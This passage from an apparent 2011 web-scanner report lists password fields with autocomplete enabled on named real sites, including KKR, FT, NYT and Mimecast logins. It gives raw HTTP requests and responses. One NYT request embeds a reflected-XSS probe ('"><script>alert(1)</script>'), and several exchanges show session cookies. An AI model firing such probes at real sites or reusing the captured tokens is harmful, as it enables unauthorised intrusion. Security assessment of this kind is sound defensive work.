Set-Cookie: wcmcookiewf=2YvRNL1DhnQJXpvqtrRMH62pV5nkJ3W9wswYr5TSXhRqMGc2yXqQ!-1621466656; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-20110512040747952746006; domain=.wellsfargo.com; expires=Sunday, 09-May-2021 11:07:47 GMT; path=/
Content-Language: en-US
Set-Cookie: ISD_WCM_COOKIE=876747786.16927.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/javasc
...[SNIP]...

15. Password field with autocomplete enabled
There are 23 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


15.1. https://cle-files.tuckerellis.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cle-files.tuckerellis.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: cle-files.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tuckerellis.com/info/client-access
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.9.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 12 May 2011 12:25:44 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: _filetransfer_session=bd9523d5f7e3fb1ae566f67f03d46ec0; path=/; expires=Thu, 19 May 2011 12:25:44 GMT; HttpOnly
Status: 200
ETag: "db2b9a193cf2f30f9560e02ce35abe4a"
X-Runtime: 33
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta htt
...[SNIP]...
<div>
<form action="https://cle-files.tuckerellis.com/login" method="post"><div style="margin:0;padding:0;display:inline">
...[SNIP]...
<td class="login"><input id="user_password" name="user[password]" size="30" type="password" /></td>
...[SNIP]...

15.2. https://cle-files.tuckerellis.com/register

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cle-files.tuckerellis.com
Path:   /register

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /register HTTP/1.1
Host: cle-files.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cle-files.tuckerellis.com/
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.9.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West; _filetransfer_session=9f3e69b83e302794ac0d585e9faf9b16

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 12 May 2011 12:25:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: _filetransfer_session=9f3e69b83e302794ac0d585e9faf9b16; path=/; expires=Thu, 19 May 2011 12:25:59 GMT; HttpOnly
Status: 200
ETag: "a849a16be06d2272b0f50b58f60ebb30"
X-Runtime: 36
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta htt
...[SNIP]...
</p>


<form action="/register" method="post"><div style="margin:0;padding:0;display:inline">
...[SNIP]...
<dd><input class="required password" id="user_password" name="user[password]" size="25" type="password" /></dd>
...[SNIP]...
<dd><input equalTo="#user_password" id="user_password_confirmation" name="user[password_confirmation]" size="25" type="password" /></dd>
...[SNIP]...

15.3. https://investor.kkr.com/Login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://investor.kkr.com
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /Login.aspx?ReturnUrl=%2fBusyBoxDotNet.axd%3fres%3dFadingCircles.gif%26noGzip%3d1&res=FadingCircles.gif&noGzip=1 HTTP/1.1
Host: investor.kkr.com
Connection: keep-alive
Referer: https://investor.kkr.com/Login.aspx?ReturnUrl=%2fDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 13726


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<body onload="MasterPage_OnLoad()" onunload="MasterPage_OnUnload()">
<form name="aspnetForm" method="post" action="Login.aspx?ReturnUrl=%2fBusyBoxDotNet.axd%3fres%3dFadingCircles.gif%26noGzip%3d1&amp;res=FadingCircles.gif&amp;noGzip=1" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$MainContent$loginCtl$Password" type="password" id="ctl00_MainContent_loginCtl_Password" class="fields-email" />
<span id="ctl00_MainContent_loginCtl_RequiredFieldValidator2" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

15.4. https://investor.kkr.com/Login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://investor.kkr.com
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /Login.aspx?ReturnUrl=%2fBusyBoxDotNet.axd%3fres%3dBBDN.js%24YAHOO.js%24dom.js%24event.js%24animation.js%24BrowserSniff.js%24Common.js%24BusyBox.js%26noGzip%3d1&res=BBDN.js$YAHOO.js$dom.js$event.js$animation.js$BrowserSniff.js$Common.js$BusyBox.js&noGzip=1 HTTP/1.1
Host: investor.kkr.com
Connection: keep-alive
Referer: https://investor.kkr.com/Recovery.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 13884


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<body onload="MasterPage_OnLoad()" onunload="MasterPage_OnUnload()">
<form name="aspnetForm" method="post" action="Login.aspx?ReturnUrl=%2fBusyBoxDotNet.axd%3fres%3dBBDN.js%24YAHOO.js%24dom.js%24event.js%24animation.js%24BrowserSniff.js%24Common.js%24BusyBox.js%26noGzip%3d1&amp;res=BBDN.js%24YAHOO.js%24dom.js%24event.js%24animation.js%24BrowserSniff.js%24Common.js%24BusyBox.js&amp;noGzip=1" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$MainContent$loginCtl$Password" type="password" id="ctl00_MainContent_loginCtl_Password" class="fields-email" />
<span id="ctl00_MainContent_loginCtl_RequiredFieldValidator2" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

15.5. https://investor.kkr.com/Login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://investor.kkr.com
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /Login.aspx?ReturnUrl=%2fDefault.aspx HTTP/1.1
Host: investor.kkr.com
Connection: keep-alive
Referer: https://investor.kkr.com/investor/login.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 13643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<body onload="MasterPage_OnLoad()" onunload="MasterPage_OnUnload()">
<form name="aspnetForm" method="post" action="Login.aspx?ReturnUrl=%2fDefault.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$MainContent$loginCtl$Password" type="password" id="ctl00_MainContent_loginCtl_Password" class="fields-email" />
<span id="ctl00_MainContent_loginCtl_RequiredFieldValidator2" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

15.6. https://investor.kkr.com/Login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://investor.kkr.com
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /Login.aspx?ReturnUrl=%2fBusyBoxDotNet.axd%3fres%3dmaskBG.png%26noGzip%3d1&res=maskBG.png&noGzip=1 HTTP/1.1
Host: investor.kkr.com
Connection: keep-alive
Referer: https://investor.kkr.com/Login.aspx?ReturnUrl=%2fDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 13712


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<body onload="MasterPage_OnLoad()" onunload="MasterPage_OnUnload()">
<form name="aspnetForm" method="post" action="Login.aspx?ReturnUrl=%2fBusyBoxDotNet.axd%3fres%3dmaskBG.png%26noGzip%3d1&amp;res=maskBG.png&amp;noGzip=1" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$MainContent$loginCtl$Password" type="password" id="ctl00_MainContent_loginCtl_Password" class="fields-email" />
<span id="ctl00_MainContent_loginCtl_RequiredFieldValidator2" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

15.7. http://media.ft.com/h/subs.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.ft.com
Path:   /h/subs.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /h/subs.html HTTP/1.1
Host: media.ft.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUserTrack=173.193.214.243.1305198170970491; AYSC=_04dc_13USA_14USA_15us_17mid%2Batlantic_18washington_24north%2Bamerica_25high_26202_27PVT_99S_; GZIP=1; opFTData=%26v%3D1; opTrackSess=%26t%3D1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:03:17 GMT
Content-Type: text/html; charset=utf-8
ETag: "812-4725d31c"
Last-Modified: Mon, 29 Oct 2007 12:33:32 GMT
Accept-Ranges: bytes
Server: Apache/1.3.37
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Connection: keep-alive
Content-Length: 2066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
   $Id: hdr_subscribe_content.html,v 1.30 2007/10/29 12:33:32 taylorm Exp $
...[SNIP]...
<noscript>
               <form name="loginForm" action="https://registration.ft.com/registration/barrier" method="post" id="loginForm"><div class="login-head">
...[SNIP]...
<label class="password">Password<input type="password" value="" class="text" name="password" id="password"/> </label>
...[SNIP]...

15.8. http://media.ft.com/j/common.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.ft.com
Path:   /j/common.js

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /j/common.js HTTP/1.1
Host: media.ft.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:48 GMT
Expires: Thu, 12 May 2011 13:24:22 GMT
Last-Modified: Fri, 07 May 2010 10:51:52 GMT
Cache-Control: max-age=43200
Content-Type: application/x-javascript
ETag: "6ef4-4be3f0c8"
Accept-Ranges: bytes
Server: Apache/1.3.37
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Content-Length: 28404


var USER_FIRST_NAME="FNAME";var USER_LAST_NAME="LNAME";var USER_EMAIL="EMAIL";var USER_USERNAME="USERNAME";var USER_REMEMBER_ME="REMEMBER";var SUBSCRIPTION_RETURN_VALUE="http://www.ft.com/";var SUBSC
...[SNIP]...
okie.match(/FT_Remember/);var eMail=document.cookie.match(/EMAIL=([^;:]+)/)?RegExp.$1:"Please update";var encodedPageURI=encodeURIComponent(thisPage.thisLoc);var htmlStr="";if(!isLoggedIn){htmlStr=''+'<form id="loginForm" method="post" action="https://registration.ft.com/registration/barrier/login/" name="loginForm">'+'<div class="login-head">
...[SNIP]...
<br/>'+'<input id="'+SUBSCRIPTION_PASSWORD_INPUT_ID+'" name="'+SUBSCRIPTION_PASSWORD_INPUT_ID+'" class="txt" value="'+STRING_ENTER_PASSWORD+'" type="password" /> <input type="image" alt="Log in" src="/login.gif" class="login"/>
...[SNIP]...

15.9. https://myaccount.nytimes.com/auth/login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://myaccount.nytimes.com
Path:   /auth/login

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /auth/login?URI=http://dealbook.nytimes.com/category/main-topicse7f31%2522%253E%253Cscript%253Ealert%25281%2529%253C/script%253Ed4e86dd7255/mergers-acquisitions/ HTTP/1.1
Host: myaccount.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=ABBCA6EE6FB956FC70EF4BEBA92D8B48&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.15.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199607199:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 12 May 2011 11:27:04 GMT
Content-type: text/html; charset=UTF-8
Cache-control: no-cache, must-revalidate
Connection: close
Content-Length: 10696

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
                   <title>Log In - The New York Times</title>
                           <meta http-equiv="Conte
...[SNIP]...
<td class="lastColumn wrap">
<form class="loginForm wrap" method="POST">
<fieldset>
...[SNIP]...
<div class="fieldContainer">
<input type="password" id="password" class="text" name="password" maxlength="32" value="">
<a href="http://www.nytimes.com/forgot" class="rollOver">
...[SNIP]...

15.10. http://secniche.org:2082/tmp/secniche/webalizer//usage_201105.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://secniche.org:2082
Path:   /tmp/secniche/webalizer//usage_201105.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /tmp/secniche/webalizer//usage_201105.html HTTP/1.1
Host: secniche.org:2082
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 401 Access Denied
WWW-Authenticate: Basic realm="cPanel"
Connection: close
Set-Cookie: logintheme=cpanel; path=/; HttpOnly; port=2082
Set-Cookie: cprelogin=no; path=/; HttpOnly; port=2082
Set-Cookie: cpsession=c8nOrrFvbqOSWIwMKTiLmobUg7nWh12n8Lm0BmUzByVMqdJtCxzFc9g5YnYZNbpn; path=/; HttpOnly; port=2082
Server: cpsrvd/11.28.87
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon" h
...[SNIP]...
<div id="content-wrap" align="center">

<form action="/login/" method="post" >
<input type="hidden" name="login_theme" value="cpanel" />
...[SNIP]...
<td class="login_lines"><input id="pass" type="password" name="pass" size="16" tabindex="2" /></td>
...[SNIP]...

15.11. https://secure.reportingsystem.com/TPG/index.cfm

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.reportingsystem.com
Path:   /TPG/index.cfm

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /TPG/index.cfm HTTP/1.1
Host: secure.reportingsystem.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:24:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=2712786;HttpOnly;Secure
Set-Cookie: CFTOKEN=81013834;HttpOnly;Secure
Set-Cookie: JSESSIONID=4830b14a24305d117a65TR;HttpOnly;Secure
Set-Cookie: CFID=2712786;expires=Sat, 04-May-2041 11:24:35 GMT;path=/
Set-Cookie: CFTOKEN=81013834;expires=Sat, 04-May-2041 11:24:35 GMT;path=/
Set-Cookie: JSESSIONID=4830b14a24305d117a65TR;path=/
Expires: {ts '2011-05-12 07:24:35'}
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

   <META HTT
...[SNIP]...
<div id="fForm" class="fForm">
<form name="LogIn" id="LogIn">
<INPUT TYPE="text" NAME="userid" id="userid" SIZE="20" MAXLENGTH="100" >
<INPUT TYPE="password" NAME="pwd" id="pwd" SIZE="20" MAXLENGTH="50" >
</form>
...[SNIP]...

15.12. https://secure.reportingsystem.com/carlyle/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.reportingsystem.com
Path:   /carlyle/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /carlyle/ HTTP/1.1
Host: secure.reportingsystem.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=1596924; CFTOKEN=63855037; JSESSIONID=2230e705445e33585ac4TR

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:41:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=1596924;HttpOnly;Secure
Set-Cookie: CFTOKEN=63855037;HttpOnly;Secure
Set-Cookie: JSESSIONID=2230e705445e33585ac4TR;HttpOnly;Secure
Expires: {ts '2011-05-12 07:41:10'}
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

   <META HTT
...[SNIP]...
<div id="fForm" class="fForm">
<form name="LogIn" id="LogIn">
<INPUT TYPE="text" NAME="userid" id="userid" SIZE="20" MAXLENGTH="100" >
<INPUT TYPE="password" NAME="pwd" id="pwd" SIZE="20" MAXLENGTH="50" >
</form>
...[SNIP]...

15.13. https://webmail-us.mimecast.com/webMail/login.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://webmail-us.mimecast.com
Path:   /webMail/login.jsp

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /webMail/login.jsp HTTP/1.1
Host: webmail-us.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Set-Cookie: JSESSIONID=A558B2D6AC4AE657DD0F627D7073BB13; Path=/webMail; Secure
Content-Type: text/html
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:34:17 GMT
Content-Length: 11504


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Mimecast Login</title>

...[SNIP]...
<td>
                                       <form id="loginForm" method="post" action="/webMail/login" enctype="application/x-www-form-urlencoded">
                                        <!-- s:validateAll -->
...[SNIP]...
<div id="divPassword" style="visibility: visible;"><input id="editPassword" type="password" name="password" size="27"/></div>
...[SNIP]...

15.14. http://www.digiware.net/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.digiware.net
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.digiware.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:06:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: f165d946d0a4013e03ebd5d7edb21d2c=bqhecm8n2rb4cadkusa5gg38q1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 12 May 2011 13:06:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19619


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<td><form action="/index.php" method="post" name="login" class="form-login">
<div align="center">
...[SNIP]...
<p align="center">Clave&nbsp;
<input name="passwd" type="password" class="textfields" id="mod_login_password" alt="Contrase..a" /></p>
...[SNIP]...

15.15. http://www.gobignetwork.com/funding

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gobignetwork.com
Path:   /funding

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /funding HTTP/1.1
Host: www.gobignetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
